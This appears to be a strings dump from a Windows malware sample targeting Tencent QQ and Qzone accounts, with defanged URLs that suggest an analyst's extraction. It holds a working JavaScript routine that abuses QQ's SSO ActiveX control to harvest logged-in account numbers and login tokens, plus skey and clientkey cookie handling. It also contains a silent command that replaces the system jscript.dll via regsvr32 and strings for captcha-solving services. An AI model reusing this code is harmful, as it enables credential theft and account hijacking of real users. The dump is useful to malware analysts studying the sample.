UUWiseHelper.DLL
uu_easyRecognizeUrlA
uu_easyRecognizeUrlW
uu_loginW
uu_recognizeByCodeTypeAndUrlA
uu_recognizeByCodeTypeAndUrlW
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
"0,01070
88J8R8x8
0#0'0-01070;0
=*>0>4>8><>
5%6S6
3$3,383\3|3
:-1014,URL
:-19011,
TEAKEY
\dc.dll
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
WSOCK32.dll
MSVCP60.dll
ReportError_A
VBYB_ReportError
VB_ReportError
debug.ini
ReportError:%s
Error:%s
%s|!|%s
\dms.pdb
%u%u,
dclog.txt
config.ini
port
settimeout:%d
[%d]%s
reg2:%s
checkok:%s %s
check fail:%s %s %s
check:%s %s
getcjfail:%s %s
getcj:%s %s
%s%uout
%s%uin
put img ok:%s
put img fail:%s
put img:%s %s %d
get result ok:%s,%s
get result fail:%s
get result:%s
notifyfail ok:%s
%s\%d-%s.png
notifyfail fail:%s,%s
notifyfail:%s
getimgok:%s,%s
getimg:%s
getinfo fail:%s
getinfo:%s,%s
setresult:%s,%s
HTTP/1.1 200 OK
recv:%d
send:%d
GET /ip.txt HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
select:%d
ioctlsocket:%d
socket:%d
api.qqchaoren.net
14.17.65.24
14.17.65.23
dama2.qqchaoren.net
dama1.qqchaoren.net
connect total:%s %d
:%s %d
connect discard:%s %d
[d-d-d d:d:d](u)
recv timeout:<%d>
recvfail:<%d>%d
server close:<%d>%d
recv:<%d>%d
send:<%d>%d
sendfail:<%d>%d
connect timeout:<%d>
connectok:<%d>%s %hu
127.0.0.1
1.1.3
&sessionid=0&keyword=
&redwords[]=
&sessionid=1&keyword=
hXXp://VVV.jsdati.com
hXXp://VVV.qqchaoren.net
hXXp://VVV.uuwise.com
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
skey=
; skey=
skey=@
function timea(){var d,s;d=new Date();d.setTime('
getEncryption("{pass}","{uin}","{code}")
{pass}
while (z   aD < aC.length) {
t  = aC.substring(z, z   aD)   "\n";
return t   aC.substring(z, aC.length)
return "0"   t.toString(16)
return t.toString(16)
if (aG < aD.length   11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert("Invalid RSA public key")
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength()   7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
au.prototype.am = aA;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = "0".charCodeAt(0);
ar = "a".charCodeAt(0);
ar = "A".charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == "-") {
if (aE   aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t  ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return "-"   this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG  = this.DB - aC)
aG  = this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = this.DV   aE
var t = this.abs(),
aE = z.abs();
aD[aC   t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z   t.t]  = t.am(z   1, 2 * t[z], aC, 2 * z   1, aD, t.t - z - 1)) >= t.DV) {
aC[z   t.t] -= t.DV;
aC[aC.t - 1]  = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT   (aG[aO - 1]   aR) * aS);
if ((aG[aO]  = aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl   (((z * this.mph   (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
/*if(navigator.appName=="Netscape"&&navigator.appVersion<"5"&&window.crypto&&window.crypto.random){ var H=window.crypto.random(32); for(K=0; K<H.length;   K){ W[ae  ]=H.charCodeAt(K)&255 } }*/
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length;   ae) {
return o.next()
for (t = 0; t < z.length;   t) {
af.prototype.nextBytes = ax;
z = (z   this.S[aD]   aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B  ) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A  = 2) {
C  = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A  ) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C  ) {
var A = u.length;
for (var B = 0; B < E.length; B  ) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B  = 2) {
C[A  ] = parseInt(E.substr(B, 2), 16)
for (var B = 0; B < C.length; B  ) {
A  = String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = "=";
d.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /";
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   B   B);
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   G.charAt((H >> 6) & 63)   B);
return A.join("")
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push("\\x"   str.substr(i, 2))
arr = arr.join("");
if (Math.random() > (probability || 1)) {
var url = location.protocol   "//ui.ptlogin2.qq.com/cgi-bin/report?id="   mid;
var s = document.createElement("img");
s.src = url;
function getEncryption(password, salt, vcode) {
var md5Pwd = md5(password),
rsaH1 = RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = "000"   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
TEA.initkey("");
return saltPwd.replace(/[\/\ =]/g,
"/": "-",
" ": "*",
"=": "_"
hXXp://r.qzone.qq.com/cgi-bin/user/qzone_cgi_msg_getcnt2?uin=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=http://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&pt_qzone_sig=1&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=手机QQ空间&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html
login_sig=
,login_sig:"
VVV.qqydw.com
&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.
&js_type=1&login_sig=
hXXp://check.ptlogin2.qq.com/check?regmaster=
&0.7227352769114077
hXXp://captcha.qq.com/cap_union_show?clientype=2&uin=
hXXp://captcha.qq.com/getimgbysig?aid=
&0.18814749689772725
hXXp://captcha.qq.com/cap_union_verify?aid=
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=5-12-
hXXp://ptlogin2.qq.com/login?u=
ptmbsuperkey=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptsig=
skey=
p_skey=
'0','','0','
hXXp://find.qq.com/index.html?version=1&im_version=5407&width=910&height=610&search_target=0
&sessionid=0&keyword=&agerg=
\jscript.dll
`.data
FJScript.dll
{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}
Software\Microsoft\Windows Script\Settings
SOFTWARE\Microsoft\Windows Script\Features
JSCRIPT.dll
JScript.Compact Author
{f414c261-6ac0-11cf-b6d1-00aa00bbbb58}
Sœ3
JScript.Compact
JScript.Encode
{lX-X-X-XX-XXXXXX}
iexplore.exe
?456789:;<=
!"#$%&'()* ,-./0123
0 0/01070?0?0
f;P.uz3
f;P.uy3
f;J.sH
$%&'()* ,-
./0123456789:;<=>?
{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}
{cc5bbec3-db4a-4bed-828d-08d78ee3e1ed}
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyExA
VERSION.dll
msvcrt.dll
_amsg_exit
jscript.pdb
pet,wD?m|C8^[nWL4r%VshUG25.dO;-Aaz"`kN=g
.GzVBj/&IA42[vrC89pEhqO
stdole2.tlbWWW
.ObjectWW
.Math
^%sqrt
M&join
zyexec
1 1$1(1,101
4%8S8
3 3$3(3,303
9 ;$;(;,;0;4;8;
0"0,0?0]0
6%7S7]7
4#5*5 666
5064686<6
:0;4;8;<;
< <$<(<,<0<4<
99
8$9(9,90949
copy jscript.dll %windir%\system32\
regsvr32 %windir%\system32\jscript.dll /s
&num=15&cgi_host=http://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6&code_version=1&format=jsonp&need_private_comment=1&g_tk=
q.com/cgi-bin/emotion_cgi_msglist_v6?uin=
{"certified":
&count=15&sidomain=ctc.qzonestyle.gtimg.cn&useutf8=1&outputhtmlfeed=1&refer=2&r=0.4309617872349918&g_tk=
zone.qq.com/cgi-bin/feeds/feeds_html_act_all?uin=
hXXp://ic2.
hXXp://ctc.qzs.qq.com/qzone/profile/index.html?tab=info
data-unikey=\x22
data-key=\x22
WinHttp.WinHttpRequest.5.1
application/x-www-form-urlencoded
SetClientCertificate
VVV.baidu.com
Primary Key
select count(*) from sqlite_master where type='table' and tbl_name='
select name as title from sqlite_master where type='table'
select name as title from sqlite_master where type='table' and name not like('sqlite%')
select sql from sqlite_master where type='table' and name='
SELECT name FROM sqlite_master WHERE type='table' ORDER BY name
select sql from sqlite_master where type='index' and name='
select sql from sqlite_master where type='view' and name='
select sql from sqlite_master where type='trigger' and name='
%d/%d/%d %d:%d:%d
Adodb.Stream
MSScriptControl.ScriptControl
Scripting.Encoder
1, 2, 0, 1, 2, 0, 2, 0, 0, 2, 0, 2, 1, 0, 2, 0,
1, 0, 2, 0, 1, 1, 2, 0, 0, 2, 1, 0, 2, 0, 0, 2,
1, 1, 0, 2, 0, 2, 0, 1, 0, 1, 1, 2, 0, 1, 0, 2,
1, 0, 2, 0, 1, 1, 2, 0, 0, 1, 1, 2, 0, 1, 0, 2
digits["A".charCodeAt(0) i] = i
digits["a".charCodeAt(0) i] = i 26
for (var i=0; i<10; i  ) digits["0".charCodeAt(0) i] = i 52
if (char.charCodeAt(0) > 126) return char
if (escapes.indexOf(char) != -1) return escaped.substr(escapes.indexOf(char), 1)
val  = (digits[string.substr(0,1).charCodeAt(0)] << 2)
val  = (digits[string.substr(1,1).charCodeAt(0)] >> 4)
val  = (digits[string.substr(1,1).charCodeAt(0)] & 0xf) << 12
val  = ((digits[string.substr(2,1).charCodeAt(0)] >> 2) << 8)
val  = ((digits[string.substr(2,1).charCodeAt(0)] & 0x3) << 22)
val  = (digits[string.substr(3,1).charCodeAt(0)] << 16)
scriptIndex = encodingString.indexOf(marker, stringIndex)
unEncodingString  = encodingString.substring(stringIndex, scriptIndex)
scriptIndex  = marker.length
unEncodingString  = encodingString.substr(stringIndex, encodingString.length)
encodingLength = encodingString.substr(scriptIndex, 6)
scriptIndex  = (6   "==".length)
stringIndex = scriptIndex   "DQgAAA==^#~@".length
char = encodingString.substr(scriptIndex, 1)
if (char.charCodeAt(0) < 0xFF)
unEncodingString  = String.fromCharCode(transformed[pick_encoding[unEncodingIndexd]][char.charCodeAt(0)])
unEncodingString  = unescape(encodingString.substr(  scriptIndex, 1))
re = new RegExp("(JScript|VBscript).encode", "gmi")
while(arr = re.exec(unEncodingString)) unEncodingString = RegExp.leftContext   RegExp.$1   RegExp.rightContext
strdec(AdodbStream.ReadText);
function urlencodeutf8(str) {
function urlencode(str) {
function urldecode(str) {
urlencode
0.0.0.0
0000000000
Math.round(new Date().getTime()/1000)
Math.round(new Date().getTime())
Math.round(new Date().getTime() * 100)
7 9 10 5 8 4 2 1 6 3 7 9 10 5 8 4 2
WScript.Shell
rundll32.exe url.dll,FileProtocolHandler
function trim_output() {while (output.length && (output[output.length - 1] === " " || output[output.length - 1] === indent_string)) {output.pop();}}
function print_newline(ignore_repeated) {ignore_repeated = typeof ignore_repeated === "undefined" ? true : ignore_repeated;trim_output();if (!output.length) {return;}if (output[output.length - 1] !== "\n" || !ignore_repeated) {output.push("\n");}for (var i = 0; i < indent_level; i  ) {output.push(indent_string);}}
function print_space() {var last_output = output.length ? output[output.length - 1] : " ";if (last_output !== " " && last_output !== "\n" && last_output !== indent_string) {output.push(" ");}}
function print_token() {output.push(token_text);}
function remove_indent() {if (output.length && output[output.length - 1] === indent_string) {output.pop();}}
function set_mode(mode) {modes.push(current_mode);current_mode = mode;}
function restore_mode() {do_block_just_closed = current_mode === "DO_BLOCK";current_mode = modes.pop();}
function in_array(what, arr) {for (var i = 0; i < arr.length; i  ) {if (arr[i] === what) {return true;}}return false;}
function get_next_token() {var n_newlines = 0;var c = "";do {if (parser_pos >= input.length) {return ["", "TK_EOF"];}c = input.charAt(parser_pos);parser_pos  = 1;if (c === "\n") {n_newlines  = 1;}} while (in_array(c, whitespace));if (n_newlines > 1) {for (var i = 0; i < 2; i  ) {print_newline(i === 0);}}var wanted_newline = n_newlines === 1;if (in_array(c, wordchar)) {if (parser_pos < input.length) {while (in_array(input.charAt(parser_pos), wordchar)) {c  = input.charAt(parser_pos);parser_pos  = 1;if (parser_pos === input.length) {break;}}}if (parser_pos !== input.length && c.match(/^[0-9] [Ee]$/) && input.charAt(parser_pos) === "-") {parser_pos  = 1;var t = get_next_token(parser_pos);c  = "-"   t[0];return [c, "TK_WORD"];}if (c === "in") {return [c, "TK_OPERATOR"];}return [c, "TK_WORD"];}if (c === "(" || c === "[") {return [c, "TK_START_EXPR"];}if (c === ")" || c === "]") {return [c, "TK_END_EXPR"];}if (c === "{") {return [c, "TK_START_BLOCK"];}if (c === "}") {return [c, "TK_END_BLOCK"];}if (c === ";") {return [c, "TK_END_COMMAND"];}if (c === "/") {var comment = "";if (input.charAt(parser_pos) === "*") {parser_pos  = 1;if (parser_pos < input.length) {while (!(input.charAt(parser_pos) === "*" && input.charAt(parser_pos   1) && input.charAt(parser_pos   1) === "/") && parser_pos < input.length) {comment  = input.charAt(parser_pos);parser_pos  = 1;if (parser_pos >= input.length) {break;}}}parser_pos  = 2;return ["/*"   comment   "*/", "TK_BLOCK_COMMENT"];}if (input.charAt(parser_pos) === "/") {comment = c;while (input.charAt(parser_pos) !== "\r" && input.charAt(parser_pos) !== "\n") {comment  = input.charAt(parser_pos);parser_pos  = 1;if (parser_pos >= input.length) {break;}}parser_pos  = 1;if (wanted_newline) {print_newline();}return [comment, "TK_COMMENT"];}}if (c === "'" || c === "\"" || c === "/" && (last_type === "TK_WORD" && last_text === "return" || last_type === "TK_START_EXPR" || last_type === "TK_END_BLOCK" || last_type === "TK_OPERATOR" || last_type === "TK_EOF" || last_type === "TK_END_COMMAND")) {var sep = c;var esc = false;c = "";if (parser_pos < input.length) {while (esc || input.charAt(parser_pos) !== sep) {c  = input.charAt(parser_pos);if (!esc) {esc = input.charAt(parser_pos) === "\\";} else {esc = false;}parser_pos  = 1;if (parser_pos >= input.length) {break;}}}parser_pos  = 1;if (last_type === "TK_END_COMMAND") {print_newline();}return [sep   c   sep, "TK_STRING"];}if (in_array(c, punct)) {while (parser_pos < input.length && in_array(c   input.charAt(parser_pos), punct)) {c  = input.charAt(parser_pos);parser_pos  = 1;if (parser_pos >= input.length) {break;}}return [c, "TK_OPERATOR"];}return [c, "TK_UNKNOWN"];}
indent_character = indent_character || " ";indent_size = indent_size || 4;indent_string = "";while (indent_size--) {indent_string  = indent_character;}input = js_source_text;last_word = "";last_type = "TK_START_EXPR";last_text = "";output = [];do_block_just_closed = false;var_line = false;var_line_tainted = false;whitespace = "\n\r\t ".split("");wordchar = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$".split("");punct = "  - * / % &    -- =  = -= *= /= $= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! !! , : ? ^ ^= |=".split(" ");line_starters = "continue,try,throw,return,var,if,switch,case,default,for,while,break,function".split(",");current_mode = "BLOCK";modes = [current_mode];indent_level = indent_level || 0;parser_pos = 0;in_case = false;while (true) {var t = get_next_token(parser_pos);token_text = t[0];token_type = t[1];if (token_type === "TK_EOF") {break;}switch (token_type) {case "TK_START_EXPR":var_line = false;set_mode("EXPRESSION");if (last_type === "TK_END_EXPR" || last_type === "TK_START_EXPR") {} else if (last_type !== "TK_WORD" && last_type !== "TK_OPERATOR") {print_space();} else if (in_array(last_word, line_starters) && last_word !== "function") {print_space();}print_token();break;case "TK_END_EXPR":print_token();restore_mode();break;case "TK_START_BLOCK":if (last_word === "do") {set_mode("DO_BLOCK");} else {set_mode("BLOCK");}if (last_type !== "TK_OPERATOR" && last_type !== "TK_START_EXPR") {if (last_type === "TK_START_BLOCK") {print_newline();} else {print_space();}}print_token();indent();break;case "TK_END_BLOCK":if (last_type === "TK_START_BLOCK") {trim_output();unindent();} else {unindent();print_newline();}print_token();restore_mode();break;case "TK_WORD":if (do_block_just_closed) {print_space();print_token();print_space();break;}if (token_text === "case" || token_text === "default") {if (last_text === ":") {remove_indent();} else {unindent();print_newline();indent();}print_token();in_case = true;break;}prefix = "NONE";if (last_type === "TK_END_BLOCK") {if (!in_array(token_text.toLowerCase(), ["else", "catch", "finally"])) {prefix = "NEWLINE";} else {prefix = "SPACE";print_space();}} else if (last_type === "TK_END_COMMAND" && (current_mode === "BLOCK" || current_mode === "DO_BLOCK")) {prefix = "NEWLINE";} else if (last_type === "TK_END_COMMAND" && current_mode === "EXPRESSION") {prefix = "SPACE";} else if (last_type === "TK_WORD") {prefix = "SPACE";} else if (last_type === "TK_START_BLOCK") {prefix = "NEWLINE";} else if (last_type === "TK_END_EXPR") {print_space();prefix = "NEWLINE";}if (last_type !== "TK_END_BLOCK" && in_array(token_text.toLowerCase(), ["else", "catch", "finally"])) {print_newline();} else if (in_array(token_text, line_starters) || prefix === "NEWLINE") {if (last_text === "else") {print_space();} else if ((last_type === "TK_START_EXPR" || last_text === "=") && token_text === "function") {} else if (last_type === "TK_WORD" && (last_text === "return" || last_text === "throw")) {print_space();} else if (last_type !== "TK_END_EXPR") {if ((last_type !== "TK_START_EXPR" || token_text !== "var") && last_text !== ":") {if (token_text === "if" && last_type === "TK_WORD" && last_word === "else") {print_space();} else {print_newline();}}} else {if (in_array(token_text, line_starters) && last_text !== ")") {print_newline();}}} else if (prefix === "SPACE") {print_space();}print_token();last_word = token_text;if (token_text === "var") {var_line = true;var_line_tainted = false;}break;case "TK_END_COMMAND":print_token();var_line = false;break;case "TK_STRING":if (last_type === "TK_START_BLOCK" || last_type === "TK_END_BLOCK") {print_newline();} else if (last_type === "TK_WORD") {print_space();}print_token();break;case "TK_OPERATOR":var start_delim = true;var end_delim = true;if (var_line && token_text !== ",") {var_line_tainted = true;if (token_text === ":") {var_line = false;}}if (token_text === ":" && in_case) {print_token();print_newline();break;}in_case = false;if (token_text === ",") {if (var_line) {if (var_line_tainted) {print_token();print_newline();var_line_tainted = false;} else {print_token();print_space();}} else if (last_type === "TK_END_BLOCK") {print_token();print_newline();} else {if (current_mode === "BLOCK") {print_token();print_newline();} else {print_token();print_space();}}break;} else if (token_text === "--" || token_text === "  ") {if (last_text === ";") {start_delim = true;end_delim = false;} else {start_delim = false;end_delim = false;}} else if (token_text === "!" && last_type === "TK_START_EXPR") {start_delim = false;end_delim = false;} else if (last_type === "TK_OPERATOR") {start_delim = false;end_delim = false;} else if (last_type === "TK_END_EXPR") {start_delim = true;end_delim = true;} else if (token_text === ".") {start_delim = false;end_delim = false;} else if (token_text === ":") {if (last_text.match(/^\d $/)) {start_delim = true;} else {start_delim = false;}}if (start_delim) {print_space();}print_token();if (end_delim) {print_space();}break;case "TK_BLOCK_COMMENT":print_newline();print_token();print_newline();break;case "TK_COMMENT":print_space();print_token();print_newline();break;case "TK_UNKNOWN":print_token();break;default:;}last_type = token_type;last_text = token_text;}return output.join("");}
x =a.replace(/^\s /, '')
1970/01/01 00:00:00
1970-01-01 00:00:00
\Microsoft\Network\Connections\pbk\rasphone.pbk
ChangePasswordRequested
PasswordExpired
TempObj=JSON.parse(str);
var obj=JSON.parse(str);
Lobj.push(obj);
return Lobj.length;
function GetAllKey(){
Lobj = JSON.parse(str);
var str=JSON.stringify(Lobj);
return Lobj.str;
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf())
? this.getUTCFullYear()   '-'  
f(this.getUTCMonth()   1)   '-'  
f(this.getUTCDate())   'T'  
f(this.getUTCHours())   ':'  
f(this.getUTCMinutes())   ':'  
f(this.getUTCSeconds())   'Z'
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
'"' : '\\"',
'\\': '\\\\'
escapable.lastIndex = 0;
return escapable.test(string) ? '"'   string.replace(escapable, function (a) {
: '\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
k, // The member key.
value = holder[key];
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
v = partial.length === 0
? '[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']'
: '['   partial.join(',')   ']';
length = rep.length;
partial.push(quote(k)   (gap ? ': ' : ':')   v);
if (Object.prototype.hasOwnProperty.call(value, k)) {
v = partial.length === 0
? '{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}'
: '{'   partial.join(',')   '}';
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
